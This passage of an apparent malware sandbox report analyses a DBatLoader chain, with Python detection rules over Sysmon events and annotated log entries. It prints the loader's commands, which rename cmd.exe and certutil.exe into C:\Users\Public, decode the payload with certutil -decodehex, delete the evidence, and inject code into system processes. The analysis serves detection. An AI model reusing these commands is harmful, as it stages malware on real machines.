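    """Sorted rule names that match one Sysmon-style event (EventID 11 FileCreate, 1 ProcessCreate)."""
    hits = []
    if ev["EventID"] == 11:
        writer = ntpath.basename(ev["Image"]).lower()
        target = ev["TargetFilename"]
        if _is_exec(target) and _under_public(target):
            if writer in COPY_LOLBINS:
                hits.append("lolbin_copy_to_public")
            if _under_public(ev["Image"]):
                hits.append("public_process_writes_executable")
        if target.lower().endswith(".pif"):
            hits.append("pif_extension")
    elif ev["EventID"] == 1:
        image = ev["Image"]
        if _under_public(image):
            hits.append("exec_from_public")
        if _under_public(ev.get("ParentImage", "")):
            hits.append("parent_in_public")
        if image.lower().endswith(".pif"):
            hits.append("pif_extension")
        # OriginalFileName comes from the PE version resource; Sysmon logs "-" when absent.
        orig = ev.get("OriginalFileName", "")
        if orig not in ("", "-", "?") and orig.lower() != ntpath.basename(image).lower():
            hits.append("renamed_system_binary")
    return sorted(hits)


def evaluate(events) -> dict:
    """Map event index -> rule names, for events that match at least one rule."""
    return {i: r for i, ev in enumerate(events) if (r := rules_for(ev))}


# Constructed events modelled on the dropped-file lines of the report. Parent images and
# OriginalFileName values are assumptions for the example, not sandbox output.
SAMPLE_EVENTS = [
    {"EventID": 11, "Image": r"C:\Windows\System32\extrac32.exe", "TargetFilename": r"C:\Users\Public\alpha.exe"},
    {"EventID": 11, "Image": r"C:\Windows\System32\extrac32.exe", "TargetFilename": r"C:\Users\Public\kn.exe"},
    {"EventID": 11, "Image": r"C:\Windows\SysWOW64\esentutl.exe", "TargetFilename": r"C:\Users\Public\alpha.pif"},
    {"EventID": 11, "Image": r"C:\Users\Public\kn.exe", "TargetFilename": r"C:\Users\Public\Libraries\AnyDesk.PIF"},
    {"EventID": 1, "Image": r"C:\Users\Public\alpha.exe", "OriginalFileName": "Cmd.Exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 1, "Image": r"C:\Users\Public\kn.exe", "OriginalFileName": "CertUtil.exe",
     "ParentImage": r"C:\Users\Public\alpha.exe"},
    {"EventID": 1, "Image": r"C:\Users\Public\Libraries\AnyDesk.PIF", "OriginalFileName": "-",
     "ParentImage": r"C:\Users\Public\alpha.pif"},
    # Benign noise that must not fire: a document in Public, and notepad started from the shell.
    {"EventID": 11, "Image": r"C:\Windows\explorer.exe", "TargetFilename": r"C:\Users\Public\Documents\notes.txt"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for idx, names in evaluate(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["Image"], names)
```

The renamed-binary rule is the one with the best signal-to-noise ratio here: a process called alpha.exe whose version resource says Cmd.Exe is rare in legitimate software, whereas writes to C:\Users\Public by themselves are noisy on shared workstations.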

          Boot Survival

Source: C:\Windows\SysWOW64\esentutl.exe -> File created: C:\Users\Public\alpha.pif
Source: C:\Windows\System32\extrac32.exe -> File created: C:\Users\Public\alpha.exe
Source: C:\Windows\System32\extrac32.exe -> File created: C:\Users\Public\kn.exe
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Code function: 10_2_02D5AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,10_2_02D5AB1C (a table of APIs resolved by name at run time from one module handle)
Source: C:\Windows\System32\cmd.exe -> Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe -> Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe -> Process information set: NOOPENFILEERRORBOX (reported 8 times)
Source: C:\Windows\SysWOW64\msdt.exe -> Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe -> Process information set: NOOPENFILEERRORBOX
The "Process information set" entries are error-mode changes (SetErrorMode): SEM_FAILCRITICALERRORS and SEM_NOOPENFILEERRORBOX stop Windows from showing a dialog when a file or device is missing, and SEM_NOGPFAULTERRORBOX in msdt.exe suppresses the crash dialog, so a failing stage in a hollowed host ends silently instead of leaving a window on the user's screen.

          Malware Analysis System Evasion

Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Memory allocated: 2D40000 memory commit 500006912
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Memory allocated: 2D41000 memory commit 500178944
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Memory allocated: 2D6D000 memory commit 500002816
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Memory allocated: 2D6E000 memory commit 500350976
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Memory allocated: 2DC4000 memory commit 501014528
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Memory allocated: 2EBC000 memory commit 500006912
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Memory allocated: 2EBE000 memory commit 500015104
Each of these commits is roughly 500 MB in the 0x02D40000 region, which is where the unpacked DBatLoader image (10.2.AnyDesk.PIF.2d40000.0.unpack in the Yara hits) lives. Oversized allocations are a known emulator check: a sandbox or emulator with a small memory budget fails or stalls on them, while a real host satisfies them.
Source: C:\Windows\SysWOW64\SndVol.exe -> API/Special instruction interceptor: Address: 7FFBCB7AD324
Source: C:\Windows\SysWOW64\SndVol.exe -> API/Special instruction interceptor: Address: 7FFBCB7B0774
Source: C:\Windows\SysWOW64\SndVol.exe -> API/Special instruction interceptor: Address: 7FFBCB7B0154
Source: C:\Windows\SysWOW64\SndVol.exe -> API/Special instruction interceptor: Address: 7FFBCB7AD8A4
Source: C:\Windows\SysWOW64\SndVol.exe -> API/Special instruction interceptor: Address: 7FFBCB7ADA44
Source: C:\Windows\SysWOW64\SndVol.exe -> API/Special instruction interceptor: Address: 7FFBCB7AD1E4
Source: C:\Windows\SysWOW64\SndVol.exe -> RDTSC instruction interceptor: First address: 4999904 second address: 499990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\SndVol.exe -> RDTSC instruction interceptor: First address: 4999B7E second address: 4999B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe -> RDTSC instruction interceptor: First address: E89904 second address: E8990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe -> RDTSC instruction interceptor: First address: E89B7E second address: E89B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
The two rdtsc reads six bytes apart measure the cycle count consumed by the instructions between them. Under a hypervisor that traps RDTSC, or while single-stepping in a debugger, that delta is orders of magnitude larger than on bare metal, which is the check behind the "RDTSC time measurements" signature in the overview. The same sequence sits at the same page offsets (...904 and ...B7E) in SndVol.exe and msdt.exe, so it belongs to the one injected payload running in both hosts rather than to either program.
Source: C:\Windows\explorer.exe -> Window / User API: threadDelayed 9427
Source: C:\Windows\explorer.exe -> Window / User API: threadDelayed 496
Source: C:\Windows\explorer.exe -> Window / User API: foregroundWindowGot 817
Source: C:\Windows\SysWOW64\msdt.exe -> Window / User API: threadDelayed 2758
Source: C:\Windows\SysWOW64\msdt.exe -> Window / User API: threadDelayed 7212
Source: C:\Users\Public\alpha.exe -> API coverage: 7.9 %
Source: C:\Users\Public\alpha.exe -> API coverage: 8.6 %
Source: C:\Users\Public\kn.exe -> API coverage: 0.8 %
Source: C:\Users\Public\alpha.exe -> API coverage: 9.5 %
Source: C:\Windows\explorer.exe TID: 2940 -> Thread sleep count: 9427 > 30
Source: C:\Windows\explorer.exe TID: 2940 -> Thread sleep time: -18854000s >= -30000s
Source: C:\Windows\explorer.exe TID: 2940 -> Thread sleep count: 496 > 30
Source: C:\Windows\explorer.exe TID: 2940 -> Thread sleep time: -992000s >= -30000s
Source: C:\Windows\System32\conhost.exe -> Last function: Thread delayed
Source: C:\Windows\SysWOW64\msdt.exe -> Last function: Thread delayed
Both sleep totals divide evenly by the call count (18854000 / 9427 and 992000 / 496 are both 2000), so thread 2940 of explorer.exe issues the same fixed delay thousands of times; the sandbox reports the negative relative interval passed to NtDelayExecution, so the "s" unit is the report's label rather than a statement that each wait is 2000 seconds. The 817 GetForegroundWindow polls in explorer.exe are a user-interaction check that separates a desktop with an active user from an idle sandbox. The low API coverage of alpha.exe and kn.exe is expected for cmd.exe and certutil.exe, general-purpose tools of which a single command exercises only a small part, and is not evidence of dormant malicious code.
Source: C:\Users\Public\alpha.exe -> Code function: 4_2_00007FF6E943823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,4_2_00007FF6E943823C
Source: C:\Users\Public\alpha.exe -> Code function: 4_2_00007FF6E9432978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,4_2_00007FF6E9432978
Source: C:\Users\Public\alpha.exe -> Code function: 4_2_00007FF6E9421560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,4_2_00007FF6E9421560
Source: C:\Users\Public\alpha.exe -> Code function: 4_2_00007FF6E94235B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,4_2_00007FF6E94235B8
Source: C:\Users\Public\alpha.exe -> Code function: 4_2_00007FF6E9447B4C FindFirstFileW,FindNextFileW,FindClose,4_2_00007FF6E9447B4C
Source: C:\Users\Public\alpha.exe -> Code function: 6_2_00007FF6E943823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,6_2_00007FF6E943823C
Source: C:\Users\Public\alpha.exe -> Code function: 6_2_00007FF6E9432978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,6_2_00007FF6E9432978
Source: C:\Users\Public\alpha.exe -> Code function: 6_2_00007FF6E9421560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,6_2_00007FF6E9421560
Source: C:\Users\Public\alpha.exe -> Code function: 6_2_00007FF6E94235B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,6_2_00007FF6E94235B8
Source: C:\Users\Public\alpha.exe -> Code function: 6_2_00007FF6E9447B4C FindFirstFileW,FindNextFileW,FindClose,6_2_00007FF6E9447B4C
Source: C:\Users\Public\kn.exe -> Code function: 7_2_00007FF68548C6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,7_2_00007FF68548C6F8
Source: C:\Users\Public\kn.exe -> Code function: 7_2_00007FF6854F234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,7_2_00007FF6854F234C
Source: C:\Users\Public\kn.exe -> Code function: 7_2_00007FF6854F3100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,7_2_00007FF6854F3100
Source: C:\Users\Public\kn.exe -> Code function: 7_2_00007FF6854F10C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,7_2_00007FF6854F10C4
Source: C:\Users\Public\kn.exe -> Code function: 7_2_00007FF6854F6F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,7_2_00007FF6854F6F80
Source: C:\Users\Public\kn.exe -> Code function: 7_2_00007FF6854D3674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,7_2_00007FF6854D3674
Source: C:\Users\Public\kn.exe -> Code function: 7_2_00007FF68549D4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,7_2_00007FF68549D4A4
Source: C:\Users\Public\kn.exe -> Code function: 7_2_00007FF68545D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68545D440
Source: C:\Users\Public\kn.exe -> Code function: 7_2_00007FF68549B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,7_2_00007FF68549B3D8
Source: C:\Users\Public\kn.exe -> Code function: 7_2_00007FF685495E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,7_2_00007FF685495E58
Source: C:\Users\Public\kn.exe -> Code function: 7_2_00007FF6854F1B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,7_2_00007FF6854F1B04
Source: C:\Users\Public\kn.exe -> Code function: 7_2_00007FF6854F19F8 #359,FindFirstFileW,FindNextFileW,FindClose,7_2_00007FF6854F19F8
Source: C:\Users\Public\kn.exe -> Code function: 7_2_00007FF68549DBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,7_2_00007FF68549DBC0
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Code function: 10_2_02D45908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,10_2_02D45908
Source: C:\Users\Public\alpha.exe -> Code function: 11_2_00007FF6E943823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,11_2_00007FF6E943823C
Source: C:\Users\Public\alpha.exe -> Code function: 11_2_00007FF6E9432978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,11_2_00007FF6E9432978
Source: C:\Users\Public\alpha.exe -> Code function: 11_2_00007FF6E9421560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,11_2_00007FF6E9421560
Source: C:\Users\Public\alpha.exe -> Code function: 11_2_00007FF6E94235B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,11_2_00007FF6E94235B8
Source: C:\Users\Public\alpha.exe -> Code function: 11_2_00007FF6E9447B4C FindFirstFileW,FindNextFileW,FindClose,11_2_00007FF6E9447B4C
Source: C:\Users\Public\kn.exe -> Code function: 7_2_00007FF6854D511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,7_2_00007FF6854D511C
Caveat: these FindFirstFile/FindNextFile loops are listed under evasion because enumerating directories is a common way to look for analysis tools on disk, but in alpha.exe and kn.exe they are the ordinary directory handling of cmd.exe and certutil.exe (the CertOpenStore loop and the CreateFileMapping/BCryptHashData routine in kn.exe are certutil's certificate-store and file-hashing code). The one entry that belongs to the loader is 10_2_02D45908 in AnyDesk.PIF, which resolves an API by name and then performs a single FindFirstFileA existence check.
Source: explorer.exe, 00000012.00000000.1548457580.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3876463266.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2284225017.00000000090DA000.00000004.00000001.00020000.00000000.sdmp -> Binary or memory string: Hyper-V RAWystem32\DriverStore\en\volume.inf_loc
Source: explorer.exe, 00000012.00000000.1540616435.0000000000A20000.00000004.00000020.00020000.00000000.sdmp -> Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000012.00000000.1548457580.0000000009255000.00000004.00000001.00020000.00000000.sdmp -> Binary or memory string: NXTcaVMWare
Source: explorer.exe, 00000012.00000003.3076789400.0000000009330000.00000004.00000001.00020000.00000000.sdmp -> Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}F
Source: explorer.exe, 00000012.00000000.1540616435.0000000000A20000.00000004.00000020.00020000.00000000.sdmp -> Binary or memory string: VMware SATA CD00=
Source: AnyDesk.PIF, 0000000A.00000002.1533987559.0000000000980000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3876463266.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2284225017.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1548457580.0000000009255000.00000004.00000001.00020000.00000000.sdmp -> Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000012.00000003.2284225017.00000000091FB000.00000004.00000001.00020000.00000000.sdmp -> Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000012.00000000.1548457580.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3876463266.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2284225017.00000000090DA000.00000004.00000001.00020000.00000000.sdmp -> Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000012.00000000.1540616435.0000000000A20000.00000004.00000020.00020000.00000000.sdmp -> Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: AnyDesk.PIF, 0000000A.00000002.1533987559.000000000093E000.00000004.00000020.00020000.00000000.sdmp -> Binary or memory string: Hyper-V RAW05
Source: explorer.exe, 00000012.00000003.3076789400.0000000009330000.00000004.00000001.00020000.00000000.sdmp -> Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000012.00000000.1548457580.0000000009255000.00000004.00000001.00020000.00000000.sdmp -> Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: explorer.exe, 00000012.00000000.1540616435.0000000000A20000.00000004.00000020.00020000.00000000.sdmp -> Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Caveat: almost all of the VMware strings come from explorer.exe memory, where they are the Plug and Play device identifiers of the analysis VM's virtual disk and SATA CD-ROM; the shell enumerates devices on its own, so these describe the environment and do not prove that the malware looked for them. The only loader-side hits are the "Hyper-V RAW" strings in AnyDesk.PIF memory, which is the display name of the AF_HYPERV Winsock provider and turns up in any process that initialises Winsock. Treat this group as weak signals; the RDTSC check and the ProcessInformation query below are the actual evasion logic.
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Process information queried: ProcessInformation

          Anti Debugging

Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Code function: 10_2_02D5F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,10_2_02D5F744 (CheckRemoteDebuggerPresent resolved by name so it never appears in the import table)
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Process queried: DebugPort
Source: C:\Windows\SysWOW64\SndVol.exe -> Process queried: DebugPort
Source: C:\Windows\SysWOW64\msdt.exe -> Process queried: DebugPort
The DebugPort queries are NtQueryInformationProcess(ProcessDebugPort), the same check CheckRemoteDebuggerPresent performs internally; seeing it in SndVol.exe and msdt.exe as well as in the loader again points to the injected payload.
Source: C:\Users\Public\alpha.exe -> Code function: 4_2_00007FF6E94463FC GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,4_2_00007FF6E94463FC
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Code function: 10_2_02D5894C LoadLibraryW,GetProcAddress,FreeLibrary,10_2_02D5894C
Source: C:\Users\Public\alpha.exe -> Code function: 4_2_00007FF6E943823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,4_2_00007FF6E943823C
Source: C:\Windows\SysWOW64\SndVol.exe -> Process token adjusted: Debug
SeDebugPrivilege enabled in SndVol.exe is what the payload needs before it can open explorer.exe for the injection described in the overview; the privilege is adjusted by the hollowed host, not by a legitimate SndVol.exe.
Source: C:\Users\Public\alpha.exe -> Code function: 4_2_00007FF6E94393B0 SetUnhandledExceptionFilter,4_2_00007FF6E94393B0
Source: C:\Users\Public\alpha.exe -> Code function: 4_2_00007FF6E9438FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF6E9438FA4
Source: C:\Users\Public\alpha.exe -> Code function: 6_2_00007FF6E94393B0 SetUnhandledExceptionFilter,6_2_00007FF6E94393B0
Source: C:\Users\Public\alpha.exe -> Code function: 6_2_00007FF6E9438FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FF6E9438FA4
Source: C:\Users\Public\kn.exe -> Code function: 7_2_00007FF685524E18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00007FF685524E18
Source: C:\Users\Public\kn.exe -> Code function: 7_2_00007FF6855253E0 SetUnhandledExceptionFilter,7_2_00007FF6855253E0
Source: C:\Users\Public\alpha.exe -> Code function: 11_2_00007FF6E94393B0 SetUnhandledExceptionFilter,11_2_00007FF6E94393B0
Source: C:\Users\Public\alpha.exe -> Code function: 11_2_00007FF6E9438FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00007FF6E9438FA4
Caveat: the IsDebuggerPresent/OutputDebugStringW and SetUnhandledExceptionFilter entries for alpha.exe and kn.exe are the C runtime startup and error-handling code of cmd.exe and certutil.exe, present in every build of those tools; they are listed by the generic heuristic and are not anti-debugging on the loader's part.

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\Public\Libraries\AnyDesk.PIF | Memory allocated: C:\Windows\SysWOW64\SndVol.exe base: 4990000 protect: page execute and read and write
          Source: C:\Users\Public\Libraries\AnyDesk.PIF | Thread created: C:\Windows\SysWOW64\SndVol.exe EIP: 49AF110
          Source: C:\Windows\System32\extrac32.exe | File created: C:\Users\Public\kn.exe
          Source: C:\Windows\System32\extrac32.exe | File created: C:\Users\Public\alpha.exe
          Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\alpha.pif
          Source: C:\Users\Public\Libraries\AnyDesk.PIF | Memory written: C:\Windows\SysWOW64\SndVol.exe base: 4990000 value starts with: 4D5A
          Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: NULL target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: NULL target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msdt.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msdt.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\SndVol.exe | Thread register set: target process: 4084
          Source: C:\Windows\SysWOW64\msdt.exe | Thread register set: target process: 4084
          Source: C:\Windows\SysWOW64\SndVol.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Windows\SysWOW64\SndVol.exe | Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: FE0000
          Source: C:\Users\Public\Libraries\AnyDesk.PIF | Memory written: C:\Windows\SysWOW64\SndVol.exe base: 4990000
          Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854D7024 GetModuleHandleW,GetProcAddress,#356,#357,CloseHandle,LocalFree,LocalFree,LocalFree,ImpersonateLoggedOnUser,#356,EqualSid,#357,LogonUserExW,GetLastError,ImpersonateLoggedOnUser,#356,#359,RevertToSelf,#356,7_2_00007FF6854D7024
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\A1 igazol#U00e1s.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\Libraries\AnyDesk.PIF C:\Users\Public\Libraries\AnyDesk.PIF
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S
          Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
          Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\A1 igazol#U00e1s.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
          Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
          Source: C:\Windows\SysWOW64\msdt.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\SndVol.exe"
          Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854C4AF4 GetSecurityDescriptorDacl,GetLastError,SetEntriesInAclW,SetSecurityDescriptorDacl,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,7_2_00007FF6854C4AF4
          Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854C4E88 DsRoleGetPrimaryDomainInformation,#357,AllocateAndInitializeSid,GetLastError,#357,AllocateAndInitializeSid,GetLastError,#357,#357,DsRoleFreeMemory,LocalFree,#357,LocalFree,LocalFree,LocalFree,7_2_00007FF6854C4E88
          Source: explorer.exe, 00000012.00000000.1548457580.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542559522.00000000044D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1541277622.0000000001090000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
